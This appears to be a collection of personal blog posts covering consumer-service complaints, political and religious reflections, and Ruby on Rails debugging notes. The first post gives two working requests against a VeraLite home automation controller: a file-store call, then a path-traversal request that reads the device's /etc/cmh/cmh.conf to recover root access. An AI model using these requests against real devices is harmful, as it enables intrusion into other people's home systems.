how to hack the veralite to get ssh root password

Home automation hardware are some of the worst products security wise.
Today I wanted to log into my veralite, but I forgot the root password.
In no more than 30 minutes, I found a way to gain root.

Source: https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt

First go here
http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test

Then go here
http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/cmh/cmh.conf

Then cry, because I just realized my home devices are open to anyone…

Goodbye 2014 – the year of falling behind

While my life is always hovering at great, 2014 has been on the lower spectrum of greatness.

It’s best illustrated with this experience I had in 2014.

So on my 31st, I was driving around to do some errands. I was feeling pretty good. I was thinking to myself, I have great friends, family, and fortune. Nothing to complain about.

Just at that moment, five Ferraris past me up on the freeway.

While I don’t think that expensive cars are an adequate barometer of success, that experience perfectly illustrates how I’ve felt all year — falling behind.

Many of my peers are now doctors, lawyers, and internet millionaires. Others are on their second kid, building that perfect nuclear family.

Me. I just want 2015 to be the year for my success.

ProtectMyID sucks

So after the Target breach, I signed up for the free credit monitoring service they offered: ProtectMyID.

Since then, I have opened a credit card, and brought into use a credit card I have not used in months. I think I also closed an account and changed the credit limit on another…

No alerts from ProtectMyID….

How the hell is this service supposed to protect anyone, if they can’t even pick up simple shit like that. Weaksauce.

The Roosevelts

I am watching this new Roosevelt documentary on PBS and I am blown away by how great the Roosevelts were, especially Eleanor.

In the 1930s, a time before civil rights or any sort of real social awareness, she was working for civil rights, women’s rights, economic equality, international aid, and even perhaps a hint at acceptance of homosexuality.

I am also blown away at how Obama’s presidency mimics FDR’s presidency, right down to the kind of insults they hurled at him. Apparently the bankers refused to call FDR “president” and referred to him as the man in the white house.

It’s also interesting that they used the Supreme Court to obstruct FDR. We have the exact same problems today.

ISIS is to Obama as Hitler’s Germany is to FDR.

Oh yea, but they were terrible parents.

Rails test fixtures and foreign_key

I learned something about rails fixtures that took me a while to figure out:

So the standard fixture reference example is

# In fixtures/categories.yml
about:
name: About

# In fixtures/articles.yml
one:
title: Welcome to Rails!
body: Hello world!
category: about

But what if I had in my model

class Articles < ActiveRecord::Base
belongs_to :category, foreign_key: :subject_id

I was thinking that since my Articles object only has a subject_id attribute, I would have to specify subject_id in the .yml

But nope, apparently you can just use category and rails will automatically put it into the correct foreign_key field, which in this case, is subject_id

Yahoo mail is terrible

I’ve been using Yahoo Mail the last couple of days, and that shit is so terrible, I had to write this blog post about it.

1. It’s slow as snail — Something is definitely wrong with the javascript engine on yahoo mail. Clicking between folders is significantly laggy and sometimes it just bugs out and won’t load

2. Mail delivery and receiving is not instant — I’ve had mail that did not arrive for over 10 minutes. WTF… I don’t think I’ve ever seen anything like this on any other mail program I’ve used.

3. The default font is like 7pt. What the hell.

4. Spam filtering is bonkers — They put half of my mail in spam. I keep marking things as not spam, but it doesn’t seem to change anything.

5. Why the fck do they keep asking me to create a public profile?? — This is like that whole G+ fiasco. I just wanted to change the name on my email, but I could not do it until I signed up for their public profile.

Stop using Yahoo Mail. It’s terrible.

Bill and Melinda Gates commencement speech at Stanford

http://news.stanford.edu/news/2014/june/gates-commencement-remarks-061514.html

You don’t even have to leave your computer to see that people have no idea what poverty and suffering looks like outside of our borders.

Go to a liberal new source like: reddit, nytimes, npr, etc.. and read the comment section of stories about the new influx of illegal minors crossing the border.

You will see that the top comments are something like “these people are terrible parents”.

That kind of sentiment shows a complete lack of understanding about the degree of suffering people are facing.

The desperation that forces parents to send their children to make a perilous trek across the desert should not be perceived as bad parenting, but as a horrific reminder that those people’s normal lives are WORSE.

Like Melinda Gates said, “there is no difference at all in what we want for our children”.

I did not arrive at this understanding because I possess some sort of superior capacity for empathy. In fact, I am usually chided for lacking empathy.

The only reason I understand this dilemma so well is because I know many Vietnamese parents who’ve made the same choices.

They put their entire family, fortunes, hopes and dreams in small boats and headed out to sea risking starvation, drowning, and piracy. But at that time, it was the “better” alternative.

The power of prayers

One thing that I miss about being religious is having the option to pray.

For non-religious people, the act of praying may look awfully weird. Like a child writing a Christmas wish list to Santa Claus.

But that’s not how I experienced prayers. It was more like having a quiet moment to sit down and talk to a close friend and counselor who is a great listener.

And the power of pray did not come from the hope that God would use his power to make your problems go away. I never believed that God would answer my prayers by letting me win the lottery, or strike down my enemies. But instead, the power of prayers came from the peace of mind that you get after praying.

Religious people have a great imagery for this: Footprints in the Sand.

For example, when something sad happens in my life, like when a family member get sick, I used prayers to deal with the sadness and powerlessness of the situation. Or when something exciting and unpredictable happens like when I applied for college. I relied on prayers to assure myself that everything is going to be ok and it will all work out.

I understand that it’s all psychological and there are many alternatives such as therapy, drugs, or even yoga…. and that’s fine. But prayers work and it’s free.

Nowadays, I don’t have that option in my toolset.

When shitty things happen, I just stare blankly into space. I don’t know who to turn to, or what to think. The uncertainty of life is just that: uncertain.

TypeError: can’t convert ActiveSupport::Duration into time interval

Timeout::timeout(6.hours){}
TypeError: can't convert ActiveSupport::Duration into time interval

One of those stupid bugs that shows up in one environment, but not the other.
Both environments are running the exact same version of Ruby (1.8.7), Rails (2.3.4), and ActiveSupport (2.3.4)

The confusing thing is, on the environment where that works, this does NOT:

sleep(6.hours)

Which is the correct behavior. But why would Timeout::timeout work??

Looking through the ActiveSupport source yielded nothing of value.

I know the solution is:

Timeout::timeout(6.hours.to_i){}

But I just want to understand why.

UPDATE: I was wrong. I was using Ruby 1.8.7 vs Ruby 1.8.7 EE

In Ruby 1.8.7 EE, The Timeout::timeout method is different.

It does not raise from a failed sleep

      y = Thread.start {
        sleep sec
        x.raise exception, "execution expired" if x.alive?
      }

Like Ruby 1.8.7 does

    y = Thread.start {
      begin
        sleep sec
      rescue => e
        x.raise e
      else
        x.raise exception, "execution expired" if x.alive?
      end
    }

Rails SSL – certificate verify failed

Woke up one morning to find the outbound ssl connections my app (Ubuntu / Apache2 / Ruby on Rails) was trying to make, are no longer working (it was working just fine yesterday) with the following errors:

OpenSSL::SSL::SSLError: SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed

It took a frustrating couple of hours digging around, and ending up on several unhelpful stackoverflow answers, for me to come to this conclusion:

The trusted SSL certs for my servers were out of date:

/etc/ssl/certs/ca-certificates.crt

The fix: Find the latest version of ca-certificates.crt and replace it.